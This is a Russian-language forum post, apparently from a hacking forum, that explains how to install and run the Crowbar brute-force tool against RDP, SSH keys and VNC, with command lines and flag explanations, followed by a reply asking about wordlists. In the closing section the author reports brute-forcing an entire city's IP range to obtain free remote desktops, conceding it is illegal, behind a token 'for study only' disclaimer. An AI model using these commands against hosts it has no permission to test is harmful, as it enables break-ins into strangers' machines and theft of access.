В этой статье разберём один очень хороший и интересный инструмент для ****форса Crowbar. Crowbar - это инструмент для перебора паролей, который применяется в ходе тестирования на проникновение. Crowbar поддерживает протоколы: Open***, Remote Desktop Protocol (RDP) с поддержкой NLA, Аутентификацию по приватному ключу SSH и Аутентификацию по ключу VNC. Установка и применение 1. В дистрибутиве Kali Linux этот инструмент можно легко установить всего одной командой: apt install crowbar Код apt install crowbar 2. Для того чтобы проверить результаты работы нашего инструмента, установим дополнительно клиенты RDP, Open*** и VNC. sudo apt-get install -y open*** freerdp-x11 vncviewer Код sudo apt-get install -y open*** freerdp-x11 vncviewer 3. Ну или если же по каким-то причинам у вас не устанавливается Crowbar, то можно также установить напрямую из GitHub: git clone https://github.com/galkan/crowbar cd crowbar/ :moder: :muscle: :muscle: :esketit: pip3 install -r requirements.txt Код git clone https://github.com/galkan/crowbar cd crowbar/ :moder: :muscle: :muscle: :esketit: pip3 install -r requirements.txt Пример работы с RDP RDP (Remote Desktop Protocol) - технология для удаленного управления компьютером через интернет или сеть. Позволяет работать на удаленном компьютере, как будто вы перед ним сидите. Здесь представлены варианты команд с использованием словарей и ручной выбор подбираемых логина и пароля, команды довольно понятные, но всё же распишу для тебя что где и за что отвечает. crowbar -b rdp -s 192.168.2.182/32 -u admin -c Aa123456 Код crowbar -b rdp -s 192.168.2.182/32 -u admin -c Aa123456 crowbar -b rdp -s 192.168.2.0/24 -U ~/Desktop/userlist -C ~/Desktop/passlist -d Код crowbar -b rdp -s 192.168.2.0/24 -U ~/Desktop/userlist -C ~/Desktop/passlist -d Где: -b rdp - выбор протокола который мы ****им, здесь у нас rdp. -s 192.168.2.0/24 - здесь выбираем диапазон IP-адресов которые будем сканировать и ****ить, ну думаю понятно что можно указать как диапазон, так и один адрес. -u -U - через маленькую u мы вписываем один логин который хотим подобрать, а через большую U указываем путь до словаря через который собираемся подбирать логин. -c -C - та же история что и с uU только тут у нас пароль, либо путь к словарю паролей. -d - этот параметр отвечает за сканирование порта tcp на заданном нами диапазоне перед попыткой грубой силы. Что в свою очередь даст представление о том, открыт ли порт для атаки. Пример работы с SSH SSH - это протокол для безопасного удаленного подключения к компьютеру или серверу через интернет. Он обеспечивает шифрование данных и аутентификацию пользователей, что делает подключение безопасным. Здесь у нас три примера: 1. C использованием одного имени пользователя и одного пароля crowbar -b sshkey -s 192.168.2.105/32 -u root -k ~/.ssh/id_rsa Код crowbar -b sshkey -s 192.168.2.105/32 -u root -k ~/.ssh/id_rsa 2. С использованием одного имени и все ключи SSH в папке crowbar -b sshkey -s 192.168.2.105/32 -u root -k ~/.ssh/ Код crowbar -b sshkey -s 192.168.2.105/32 -u root -k ~/.ssh/ 3. Через режим обнаружения crowbar -b sshkey -s 192.168.2.0/24 -u root -k ~/.ssh/ -d Код crowbar -b sshkey -s 192.168.2.0/24 -u root -k ~/.ssh/ -d Где: -b sshkey - выбор протокола который мы ****им, здесь у нас SSH. -s 192.168.2.0/24 - здесь выбираем диапазон IP-адресов которые будем сканировать и ****ить, ну думаю понятно что можно указать как диапазон, так и один адрес. -u - через маленькую u мы вписываем один логин который хотим подобрать. -k - для ключевых файлов. Пример работы с VNC VNC (Virtual Network Computing) — это широко распространенный метод удаленного доступа к рабочему столу компьютера по сети. Файл пароля с заданным номером порта: crowbar -b vnckey -s 192.168.2.105/32 -p 5902 -k ~/.vnc/passwd Код crowbar -b vnckey -s 192.168.2.105/32 -p 5902 -k ~/.vnc/passwd Где: -b vnckey - выбор протокола который мы ****им, здесь у нас VNC. -s 192.168.2.0/24 - здесь выбираем диапазон IP-адресов которые будем сканировать и ****ить, ну думаю понятно что можно указать как диапазон, так и один адрес. -p - вписываем порт. -k - для ключевых файлов. Мой пример на практике взлома RDP Если привести свой практический пример, то в теории можно брать диапазоны адресов в различных городах, сканить, ****ить и получать халявные дедики, но опять же это не надёжно и что самое главное незаконно. В примере я взял диапазон IP-адресов города "X" и пробрутил его при помощи словарей login.txt и password.txt. P.S. Все данные, предоставленные в данной статье, взяты из открытых источников, не призывают к действию и являются только лишь данными для ознакомления, и изучения механизмов используемых технологий.
вообще интересная тема, а какие логин.тхт и пасворд.тхт использовал? те что с гитхаба? --- Сообщение объединено с предыдущим 27 дек 2024 на xss проходит конкурс статей на кучу тысяч баксов, можешь там попытать удачу с этим материалом кстати